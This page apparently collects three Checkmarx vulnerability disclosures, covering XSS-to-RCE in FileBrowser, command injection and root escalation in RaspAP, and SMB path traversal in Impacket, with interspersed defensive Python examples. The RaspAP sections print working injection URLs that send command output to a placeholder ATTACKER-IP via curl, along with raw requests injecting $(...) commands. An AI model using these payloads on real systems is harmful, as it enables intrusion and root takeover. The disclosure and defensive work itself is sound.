Omri Inbar, Author at Checkmarx
https://checkmarx.com/author/omriinbar/

CVE-2021-37794: XSS to One-Click RCE in FileBrowser
https://checkmarx.com/blog/cve-2021-37794-xss-to-one-click-rce-in-filebrowser/
Thu, 23 Sep 2021 19:52:33 +0000

According to its official documentation, “FileBrowser” is an open source file managing interface within a specified directory that can be used to upload, delete, preview, rename, and edit your files. It allows the creation of multiple users, and each user can have their own directory. It can be used as a standalone app or as middleware.

After investigating FileBrowser, the Checkmarx Security Research Team discovered a stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to achieve Remote Code Execution (RCE) on the running FileBrowser instance, as shown in this blog. This vulnerability was assigned CVE-2021-37794.

CVSS Score

9.0 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Impact Summary

If the vulnerability is exploited, an attacker can run arbitrary operating system (OS) commands on the server that is running the application. As will be shown below, an attacker can achieve this with low-privileged credentials.

Description

A stored Cross Site Scripting (XSS) vulnerability in FileBrowser allows an authenticated user with upload permission to upload a malicious .svg file that acts as a stored XSS payload. FileBrowser includes a command runner feature that lets administrators execute any shell command they want before or after a certain event. If the XSS payload is triggered by an administrator, it can use this feature to run malicious OS commands on the server hosting the FileBrowser instance.

Proof-of-Concept

  1. As a user with upload privileges, upload an SVG file containing a malicious script, such as the following:

  2. This .svg will run JavaScript code that will:

    a) upload a new Global Setting configuration with the “before_upload” parameter set to “touch /tmp/rce.txt”

    b) upload a file with a random filename to trigger the command bound to the “before_upload” event

3. Open the Development tools in the browser, and copy the following URL:

http://filebrowser-ip:8080/api/preview/thumb/exploit.svg?auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoyLCJsb2NhbGUiOiJlbiIsInZpZXdNb2RlIjoibW9zYWljIiwic2luZ2xlQ2xpY2siOmZhbHNlLCJwZXJtIjp7ImFkbWluIjpmYWxzZSwiZXhlY3V0ZSI6dHJ1ZSwiY3JlYXRlIjp0cnVlLCJyZW5hbWUiOnRydWUsIm1vZGlmeSI6dHJ1ZSwiZGVsZXRlIjp0cnVlLCJzaGFyZSI6dHJ1ZSwiZG93bmxvYWQiOnRydWV9LCJjb21tYW5kcyI6W10sImxvY2tQYXNzd29yZCI6ZmFsc2UsImhpZGVEb3RmaWxlcyI6ZmFsc2V9LCJleHAiOjE2MjM0NTU0MDIsImlhdCI6MTYyMzQ0ODIwMiwiaXNzIjoiRmlsZSBCcm93c2VyIn0.8zKdkS5JeHdkPpA-Hrrv-hoGzC247hmxzMiDKci_eAA&inline=true&k=1623448194873

Note: The URL above is the XSS Payload

4. If an admin of the FileBrowser instance opens the above link, or the file itself, the XSS triggers, the payload runs the OS command, and the file rce.txt is written to /tmp:

Recommendations

This vulnerability was mitigated by adding a CSP (Content-Security-Policy) header, as can be seen in this commit:

To avoid this issue, update FileBrowser to version v2.16.0 or higher.

Timeline of Disclosure

  • July 7, 2021 – Disclosure
  • July 8, 2021 – Issue acknowledged by FileBrowser
  • July 26, 2021 – Fix committed
  • July 26, 2021 – Fixed version released
  • September 1, 2021 – CVE-2021-37794 assigned
  • September 23, 2021 – Public disclosure

Summary of Disclosure and Events

As can be seen in the Timeline of Disclosure, it only took about 2 weeks from disclosure to fix. We would like to thank FileBrowser (and specifically Oleg Lobanov) for their fast response and speedy fix of the vulnerability.

Final Words

While XSS continues to be on the OWASP Top 10 Web Application Security Risks year after year, and is considered by some to be an insignificant vulnerability, it is still one of the most common vulnerabilities that are found in the wild. In many cases (such as the one seen here), it can lead to more severe exploitations—from access to sensitive files to complete takeover of a victim’s machine.

As always, the best solution is to never trust input that you do not control, and to always sanitize input before processing it. In this case, there is also the matter of the content types being served. Because this application serves uploaded files, they should be served in a way that does not cause a browser to execute them. Serving SVG files that may have malicious contents should be avoided, and any type that a browser may render as active content (e.g., HTML, SVG) should be served in its text form instead.
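One way to serve uploads along the lines the Final Words recommend (browser-active types downgraded to text, nosniff, a restrictive CSP, the ?inline=true request honoured only for inert content), written here as an added Python example; it is not FileBrowser's code, and the extension map, the sniffing rule and the CSP value are assumptions.

```python
import posixpath
import re

# Types a browser will execute or render as active content if served as-is.
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "application/xml", "text/xml"}

# Minimal extension map (assumption: enough for this demonstration).
EXT_TYPES = {".svg": "image/svg+xml", ".html": "text/html", ".htm": "text/html",
             ".xhtml": "application/xhtml+xml", ".xml": "application/xml",
             ".png": "image/png", ".jpg": "image/jpeg", ".txt": "text/plain"}

# Leading bytes that betray markup regardless of what the name claims
# (a file called photo.png whose body starts with <svg is still an SVG).
MARKUP_RE = re.compile(rb"^\s*(?:\xef\xbb\xbf)?<(?:\?xml|!doctype|svg|html|script)\b", re.I)

# Only a safe subset of characters is allowed in the Content-Disposition
# filename so user input cannot inject additional header fields.
SAFE_NAME_RE = re.compile(r"[^A-Za-z0-9._-]")


def guess_type(filename: str) -> str:
    ext = posixpath.splitext(filename.lower())[1]
    return EXT_TYPES.get(ext, "application/octet-stream")


def is_active_content(filename: str, head: bytes) -> bool:
    """Active if either the declared type or the first bytes say markup."""
    return guess_type(filename) in ACTIVE_TYPES or bool(MARKUP_RE.match(head[:512]))


def headers_for_upload(filename: str, head: bytes, inline: bool = False) -> dict:
    """Response headers for serving one uploaded file.

    inline mirrors the ?inline=true query parameter seen in the PoC URL: it is
    honoured only for content a browser cannot execute. Anything active is
    downgraded to text/plain and forced to download, and every response carries
    nosniff plus a CSP that forbids scripts even if a browser renders the body."""
    active = is_active_content(filename, head)
    ctype = "text/plain; charset=utf-8" if active else guess_type(filename)
    safe_name = SAFE_NAME_RE.sub("_", posixpath.basename(filename)) or "download"
    disposition = "inline" if (inline and not active) else f'attachment; filename="{safe_name}"'
    return {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Content-Disposition": disposition,
    }


if __name__ == "__main__":
    # Constructed inputs: an SVG upload requested inline, and a real PNG header.
    print(headers_for_upload("exploit.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>", inline=True))
    print(headers_for_upload("photo.png", b"\x89PNG\r\n\x1a\n", inline=True))
```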

Chained RaspAP Vulnerabilities Grant Root Level Access
https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
Thu, 29 Jul 2021 17:35:00 +0000

According to its official documentation, “RaspAP” is wireless router software for many popular Debian-based devices, including the Raspberry Pi. It has a mobile-ready interface that gives the user control over the relevant services and networking options, which include advanced DHCP settings, WireGuard and OpenVPN support, SSL certificates, security audits, captive portal integration, and more.

After researching RaspAP, the Checkmarx Security Research Team found multiple vulnerabilities, including OS Command Injection vulnerabilities (CWE-78) that could lead to Remote Code Execution (RCE), as well as a Privilege Escalation vulnerability that could allow an attacker to elevate themselves to root.

Impact Summary

Using a combination of several of the discovered vulnerabilities, an attacker could execute arbitrary operating system commands with root privileges on any host running the RaspAP software. As will be shown below, an attacker can achieve this with or without credentials.

CVE-2021-33357 Unauthenticated Command Injection

CVSS Score

10.0 (Critical)

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A Command Injection vulnerability exists in “RaspAP” in the “iface” GET parameter in /ajax/networking/get_netcfg.php, when the “iface” parameter value contains special characters such as “;”. Note that while most endpoints on the application require a CSRF token, this endpoint does not. Since no other authentication mechanisms are securing this endpoint, the exploitation does not require any authentication whatsoever and can be triggered directly or via CSRF.

Vulnerability Analysis

As can be seen in a CxSAST scan result, the tainted flow in code is quite clear:

  1. A request matching /ajax/networking/get_netcfg.php with a $_GET['iface'] parameter is handled, and the parameter is loaded into the $interface variable – https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/ajax/networking/get_netcfg.php#L6
  2. The $interface variable is concatenated into the following command, which is then executed:

The endpoint /ajax/networking/get_netcfg.php does require the /includes/csrf.php page, which is supposed to ensure only authenticated users can perform meaningful actions, but upon inspection, we see:

  1. In /includes/csrf.php there is a call to csrfValidateRequest in /includes/functions.php – https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/includes/csrf.php#L6
  2. In includes/functions.php the function csrfValidateRequest only handles "POST", "PUT", "PATCH" and "DELETE" requests, whereas our endpoint reads the GET parameter $_GET['iface'], so the check never runs for it.
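The two defensive measures the analysis implies, as an added Python example that is not RaspAP's code: an allowlist for interface names combined with argv-based execution (so no shell parses the value), and the same allowlist applied to web server access logs to flag get_netcfg.php requests whose iface value cannot be a real interface. The concrete command and the log lines are constructed stand-ins.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Linux interface names are at most 15 bytes (IFNAMSIZ - 1). This allowlist
# accepts real names (eth0, wlan0, br-lan, eth0.100, eth0:1) and rejects every
# shell metacharacter, so ';', '`', '$', '|', quotes and whitespace never reach
# a command line.
IFACE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.:-]{0,14}")


def is_valid_iface(iface: str) -> bool:
    return IFACE_RE.fullmatch(iface) is not None


def validate_iface(iface: str) -> str:
    if not is_valid_iface(iface):
        raise ValueError(f"rejected interface name: {iface!r}")
    return iface


def netcfg_argv(iface: str) -> list:
    """Command as an argv list: the validated name is a single element and no
    shell ever parses it. The command itself is a hypothetical stand-in for
    whatever get_netcfg.php runs; the original is not reproduced here."""
    return ["ip", "addr", "show", "dev", validate_iface(iface)]


def run_netcfg(iface: str) -> str:
    # A list argument means shell=False: nothing is handed to /bin/sh.
    proc = subprocess.run(netcfg_argv(iface), capture_output=True, text=True, check=False)
    return proc.stdout


# Detection side: the same allowlist applied to access-log entries.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def query_values(query: str, key: str):
    # Deliberately splits on '&' only; ';' is data here, not a separator.
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if k == key:
            yield unquote_plus(v)


def suspicious_netcfg_requests(log_lines):
    """Return (method, decoded iface) for every request failing the allowlist."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("/ajax/networking/get_netcfg.php"):
            continue
        for value in query_values(query, "iface"):
            if not is_valid_iface(value):
                hits.append((m.group("method"), value))
    return hits


# Constructed access-log lines, not captured from a real RaspAP host.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Apr/2021:10:00:01 +0000] "GET /ajax/networking/get_netcfg.php?iface=wlan0 HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Apr/2021:10:00:02 +0000] "GET /ajax/networking/get_netcfg.php?iface=;id; HTTP/1.1" 200 40',
    '192.0.2.10 - - [21/Apr/2021:10:00:03 +0000] "GET /ajax/networking/get_netcfg.php?iface=wlan0%0aid HTTP/1.1" 200 40',
    '192.0.2.10 - - [21/Apr/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for method, value in suspicious_netcfg_requests(SAMPLE_LOG):
        print(f"suspicious {method} request, iface={value!r}")
```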

Proof-of-Concept

  1. Create a basic RaspAP instance by following the guide here.
  2. On the attacker machine, open a socket listener:
    • nc -nvlp 4444
  3. Browse to:

http://raspap-ip/ajax/networking/get_netcfg.php?iface=;curl%20http://ATTACKER-IP:4444/`whoami`;

As we can see, the attacker has received a request from the victim requesting the page “www-data”, which is the username of the user running the webserver.

CVE-2021-33356 Privilege Escalation

CVSS Score

9.9 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

The application runs multiple OS commands with sudo. To be able to do so, the installer grants permission to run those commands with sudo without a password.

The list of available commands is shown in the picture:

While some of these files are owned by root, some files in the /etc/raspap folder are owned by the www-data user or group, which gives www-data write permission on them. If an attacker can run OS commands as www-data, they can modify one of these files to add arbitrary bash commands, and then run the modified file with root privileges using sudo.

By chaining this with the unauthenticated OS command injection vulnerability described in this report, it is possible to run OS commands as root without authentication.
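A check a defender can run for the condition behind this chain (a NOPASSWD sudo target that the web server user can also modify), written as an added Python example rather than anything shipped by RaspAP. The sudoers line and file listing are constructed; only configport.sh is a path taken from this report, and file_info is injected so the same audit runs against a recorded listing or, via live_file_info, a live host.

```python
import os
import re
import stat

# Common one-line sudoers form, e.g.
#   www-data ALL=(ALL) NOPASSWD:/etc/raspap/lighttpd/configport.sh, /sbin/ifdown
# (tags such as SETENV: and multi-line entries are not handled here.)
NOPASSWD_RE = re.compile(
    r"^(?P<who>\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?NOPASSWD:\s*(?P<cmds>.+?)\s*$")


def parse_nopasswd(lines):
    """Yield (user, command_path) for each NOPASSWD command; arguments after
    the path are dropped, comments and unrelated lines are skipped."""
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        m = NOPASSWD_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if spec:
                yield m.group("who"), spec.split()[0]


def writable_by(mode: int, uid: int, gid: int, user_uid: int, user_gids) -> bool:
    """True if the given uid/gids may write the file (owner, group or world bit)."""
    if uid == user_uid and mode & stat.S_IWUSR:
        return True
    if gid in user_gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_sudo_targets(sudoers_lines, file_info, web_user, web_uid, web_gids):
    """NOPASSWD targets that web_user may both run with sudo and modify.

    file_info(path) -> (mode, uid, gid) or None when the path does not exist."""
    findings = []
    for who, path in parse_nopasswd(sudoers_lines):
        if who not in (web_user, "ALL"):
            continue
        info = file_info(path)
        if info is None:
            continue
        mode, uid, gid = info
        if writable_by(mode, uid, gid, web_uid, web_gids) and path not in findings:
            findings.append(path)
    return findings


def live_file_info(path):
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_mode, st.st_uid, st.st_gid


# Constructed sample: sudoers lines in the RaspAP style and a fake listing.
SAMPLE_SUDOERS = [
    "# Defaults omitted",
    "www-data ALL=(ALL) NOPASSWD:/etc/raspap/lighttpd/configport.sh, /sbin/ifdown",
    "www-data ALL=(ALL) NOPASSWD:/etc/raspap/example/readonly.sh",
]
SAMPLE_FILES = {  # path: (mode, uid, gid); uid/gid 33 is www-data on Debian
    "/etc/raspap/lighttpd/configport.sh": (0o100755, 33, 33),  # owned by www-data
    "/sbin/ifdown": (0o100755, 0, 0),                          # root-owned, 755
    "/etc/raspap/example/readonly.sh": (0o100755, 0, 33),      # group www-data, no group write
}

if __name__ == "__main__":
    print(audit_sudo_targets(SAMPLE_SUDOERS, SAMPLE_FILES.get, "www-data", 33, {33}))
```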

Proof-of-Concept

  1. Create a basic RaspAP instance by following the guide here.
  2. On the attacker machine, open a socket listener:
    • nc -nvlp 4444
  3. Browse to:

http://raspaddress/ajax/networking/get_netcfg.php?iface=;echo%20%22curl%20http://ATTACKERIP:PORT/`whoami`%22%20%3E%3E%20/etc/raspap/lighttpd/configport.sh%20;sudo%20/etc/raspap/lighttpd/configport.sh%2080%20127.0.0.1%20/etc/lighttpd/lighttpd.conf%20localhost

This time the requested page “root” shows us the command was run with root privileges.

CVE-2021-33358 Authenticated Command Injection

CVSS Score

9.9 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description

RaspAP allows creating an Access Point (AP) with the defined settings. After the settings are saved, it provides the user with a QR code that contains the SSID and password of the AP created by the application. This feature is available after authentication.

An authenticated attacker can send a POST request with a malicious payload in the “interface”, “ssid”, or “wpa_passphrase” field to run arbitrary OS commands. The command injected into the “interface” field is executed immediately. The commands injected into SSID and password fields require an additional request to the QR-code generation page to be triggered.

Vulnerability Analysis

  1. The QR code is built in the file https://github.com/RaspAP/raspap-webgui/blob/master/app/img/wifi-qr-code.php. It takes the SSID and password from the hostapd config file (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L18).
  2. The SSID and password are processed through the qr_encode function, which replaces some characters (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L15) but leaves $, (, ) and / untouched.
  3. Later (https://github.com/RaspAP/raspap-webgui/blob/8f0ae3b36aa1020d21477e66010c6b2146e7c222/app/img/wifi-qr-code.php#L44), while building the OS command, the concatenated data is processed with the mb_escapeshellarg function, which only escapes quotes (https://github.com/RaspAP/raspap-webgui/blob/e3c00a80920ae2dea516ebdd3921335eb51231f6/includes/functions.php#L523). Therefore, setting the password to $(touch /tmp/123) allows running an OS command.
  4. The “interface” parameter value is inserted directly into a system command without sanitization after the HTTP request that updated the AP configuration (https://github.com/RaspAP/raspap-webgui/blob/6d3966dd8a54dad2b85b39f2ab0fa476143f2059/includes/hostapd.php#L64).

To reproduce the vulnerability, open the security settings of the hotspot, as shown in the picture above, and insert the OS command into the password field in the following format: $(OS COMMAND). Note that some of the symbols are filtered, but this can be bypassed by using the base64 encoded OS command.

Proof-of-Concept

  1. Create a basic RaspAP instance by following the guide here.
  2. After authenticating, send the following HTTP requests to the RaspAP host:
    1. POST /hostapd_conf HTTP/1.1
       Host: localhost
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
       Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 355
       Origin: http://localhost
       Authorization: Basic YWRtaW46c2VjcmV0
       Connection: close
       Referer: http://localhost/hostapd_conf
       Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
       Upgrade-Insecure-Requests: 1

       csrf_token=ce138993d5ecd5d041fb805425ab069d700251a1be50e2ade5d51c5fa084f282&interface=lo;touch%20/tmp/checkinterface;&ssid=%24%28touch+%2Ftmp%2Fcheckssid%29&hw_mode=g&channel=1&wpa=2&wpa_pairwise=CCMP&wpa_passphrase=%24%28touch+%2Ftmp%2Fcheckpass%29&beaconintervalEnable=1&beacon_interval=100&max_num_sta=&country_code=AF&SaveHostAPDSettings=Save+settings
    2. GET /app/img/wifi-qr-code.php HTTP/1.1
       Host: localhost
       User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
       Accept: image/webp,*/*
       Accept-Language: en-US,en;q=0.5
       Accept-Encoding: gzip, deflate
       Authorization: Basic YWRtaW46c2VjcmV0
       Connection: close
       Referer: http://localhost/hostapd_conf
       Cookie: PHPSESSID=j99hb7n50dp4d26no5ccnjhf2o
  3. On the victim machine, we see all 3 files were created:

Recommendations

The developer released a fix. To avoid these issues, update RaspAP to version 2.6.6 or higher.

Timeline of Disclosure

  • Apr 21, 2021 – Disclosure
  • Apr 21, 2021 – Issue acknowledged by RaspAP
  • May 2, 2021 – Fix committed
  • June 10, 2021 – CVE-2021-33356, CVE-2021-33357, and CVE-2021-33358 assigned
  • June 6, 2021 – Fixed version released
  • July 28, 2021 – Public disclosure

Final Words

This type of research is part of the Checkmarx Security Research Team’s ongoing efforts to drive the necessary changes in software security practices among all organizations. Checkmarx is committed to analyzing open-source software to help development teams build and deploy more secure applications. Our database of open source libraries and vulnerabilities is cultivated by the Checkmarx Security Research Team, empowering CxSCA customers with risk details, remediation guidance, and exclusive vulnerabilities that go beyond the NVD.

Copyright Notices

RaspAP/raspap-webgui is licensed under the GNU General Public License v3.0
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies of this licensed document, but changing it is not allowed.

CVE-2021-31800: How We Used Impacket to Hack Itself
https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
Wed, 16 Jun 2021 04:31:57 +0000

According to its official documentation, Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets for some protocols (e.g. SMB1-3 and MSRPC), and for others, the protocol implementation itself.

After investigating Impacket, the Checkmarx Security Research Team discovered a Path Traversal vulnerability, which could allow an attacker to write malicious files to any path on the target and achieve Remote Code Execution (RCE). This vulnerability, assigned CVE-2021-31800, was found not only in the Impacket library, but also in other tools that implement the vulnerable code such as CrackMapExec and “Honeypots.”

CVSS Score

9.9 (Critical)

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Impact Summary

If the vulnerability is exploited, an attacker could write files to any location on the affected computer. This could be elevated to an RCE in a variety of ways depending on the environment and the operating system. This will be demonstrated later in this write-up.

Description

Impacket’s smbserver is vulnerable to Path Traversal Attacks. An attacker that connects to a running smbserver instance can list and write arbitrary files to any location on the attacked host (not just the chosen workdir for the server).
The reason is that while smbclient (and, of course, the Windows client) validates against relative paths in filenames, the Impacket SMB server implementation, smbserver, does not. This allows an attacker with an edited version of smbclient to exploit anyone who deploys an instance of smbserver.

Vulnerability Analysis

The following 2 lines take the filename path from the received SMB request and try to list its directory without making sure that the path is inside the intended working directory. This could enable an attacker to read the contents of the file system:

The following 2 lines take the filename path and contents from the received SMB request and try to write the contents to the received path without making sure that the path is inside the intended working directory. This could enable an attacker to write arbitrary files:
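The containment check that both code paths above are missing, written as an added Python example (not Impacket's code, and not the fix that was merged): the SMB path is normalised with every ".." collapsed before it is compared against the share root, and the on-disk operations then re-check with realpath so a symlink inside the share cannot point outside it. Function names and the tempdir demo are assumptions.

```python
import os
import posixpath
import tempfile


def smb_to_relative(smb_path: str) -> str:
    """SMB-style path (backslashes, optional leading separator) to a
    share-relative POSIX path. Empty and root requests map to '.'."""
    rel = smb_path.replace("\\", "/").strip("/")
    return rel or "."


def resolve_in_share(share_root: str, smb_path: str) -> str:
    """Absolute path inside share_root that smb_path refers to.

    Raises PermissionError when the normalised result lands outside the
    share. The comparison happens after normpath has collapsed every '..'
    segment, which is the step the vulnerable listing/write code skipped.
    The trailing '/' in the prefix stops '/srv/shared' passing as inside
    '/srv/share'."""
    root = posixpath.normpath(share_root)
    candidate = posixpath.normpath(posixpath.join(root, smb_to_relative(smb_path)))
    prefix = root if root.endswith("/") else root + "/"
    if candidate != root and not candidate.startswith(prefix):
        raise PermissionError(f"path escapes share: {smb_path!r}")
    return candidate


def is_inside_share(share_root: str, smb_path: str) -> bool:
    try:
        resolve_in_share(share_root, smb_path)
        return True
    except PermissionError:
        return False


def _real_inside(share_root: str, target: str) -> str:
    """Second check on the real file system: follow symlinks on both sides."""
    real_root = os.path.realpath(share_root)
    real_target = os.path.realpath(target)
    if os.path.commonpath([real_root, real_target]) != real_root:
        raise PermissionError(f"symlink escapes share: {target!r}")
    return real_target


def list_share(share_root: str, smb_path: str) -> list:
    return sorted(os.listdir(_real_inside(share_root, resolve_in_share(share_root, smb_path))))


def write_to_share(share_root: str, smb_path: str, data: bytes) -> str:
    target = _real_inside(share_root, resolve_in_share(share_root, smb_path))
    with open(target, "wb") as fh:
        fh.write(data)
    return target


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as workdir:  # constructed share root
        print(write_to_share(workdir, "docs\\poc.txt", b"hello"))
        print(list_share(workdir, "\\"))
        try:
            list_share(workdir, "..\\..\\tmp")
        except PermissionError as exc:
            print("refused:", exc)
```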

Proof-of-Concept

To exploit this vulnerability, we have edited Impacket’s own smbclient.py to exploit its server implementation with 2 extra functions: do_ls_exploit and do_put_exploit. The functions do the exact same thing as do_ls and do_put (which is list directory and put file), only they do not sanitize the file paths on the client.
Since this is not enforced on the server, when combined with a path containing Path Traversal strings (../), these customized functions allow an attacker to read directories and write files anywhere on the file system.
Below are the differences between the two smbclient functions and their original counterparts:


Below is a Proof-of-Concept flow of the attack:

Creating a file for injection, connecting to a running smbserver instance (run locally for demonstration purposes) using the edited smbclient.py script and connecting to WORKDIR

Listing the directory contents (empty directory)

Listing /tmp using Path Traversal exploit

Injecting poc.txt and confirming using the exploit again.

CrackMapExec

Another tool that we found containing the same vulnerability is CrackMapExec. CrackMapExec (or CME for short) is a post-exploitation tool used primarily for offensive purposes and is heavily based on the Impacket library. We have found three attack modules that use the vulnerable smbserver which are: netripper, get_timedscreenshot and get_keystrokes. When an attacker attacks a victim with one of these modules, CME opens an smbserver instance in order to collect the results. As we’ve seen before, this could be exploited by a third party.

Proof-of-Concept

Exploitation of the get_timedscreenshot module of CrackMapExec using an injected PHP Webshell in /var/www/html.


Honeypots and Chameleon

Finally, we found two honeypot-based tools (used for creating intentionally vulnerable environments that act as tripwires for incoming attacks) called “honeypots” and “Chameleon,” which again contain the same vulnerability. “Honeypots” is a Python library that bundles 16 different honeypots (including Impacket’s smbserver) in a single PyPI package for monitoring network traffic.
Chameleon is a project from the same creators which features a GUI for handling multiple honeypots (imported from the “honeypots” library), which again contains the same vulnerability.

Proof-of-Concept

Exploitation of the “honeypots” smbserver using an injected SSH Key.


Recommendations

To avoid issues like this, update the Impacket package to the latest version.

Summary of Disclosure and Events

After notifying SecureAuthCorp, they informed us that they were aware that there might be vulnerabilities in the implementation, as can be seen in this 10-year-old comment. Nevertheless, they acknowledged the vulnerability and promptly accepted our fix. We would like to thank SecureAuthCorp for their fast response and continuous contribution to the security and research community.

Timeline of Disclosure

  • Apr 20, 2021 – Disclosure
  • Apr 20, 2021 – Issue acknowledged by SecureAuthCorp
  • Apr 26, 2021 – Fix committed
  • Apr 26, 2021 – CVE-2021-31800 assigned
  • May 3, 2021 – Fixed version released
  • June 16, 2021 – Public disclosure

Final Words

The research and resulting findings with Impacket serve as a valuable reminder that almost any piece of code that could be deployed in an organization must be tested regularly and kept compliant, even if it does something as benign as serving some files via an SMB share. In this case, multiple tools that security experts in a company might deploy, either for testing or for entrapment (honeypots), would actually leave those experts vulnerable themselves.
Impacket is very popular amongst security professionals, and so are the derivative uses of the vulnerable code within it. The Checkmarx Security Research Team is dedicated to performing investigations of this nature to improve the security posture of tools and, more broadly, of organizations.

Copyright Notices

Impacket

Copyright (c) 2000 The Apache Software Foundation.  All rights reserved.
This product includes software developed by SecureAuth Corporation (https://www.secureauth.com/)

CrackMapExec

Copyright (c) 2020, byt3bl33d3r All rights reserved.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Chameleon

Copyright (C) 2007 Free Software Foundation, Inc. https://fsf.org/  Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

Honeypots

Copyright (C) 2007 Free Software Foundation, Inc. https://fsf.org/  Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.
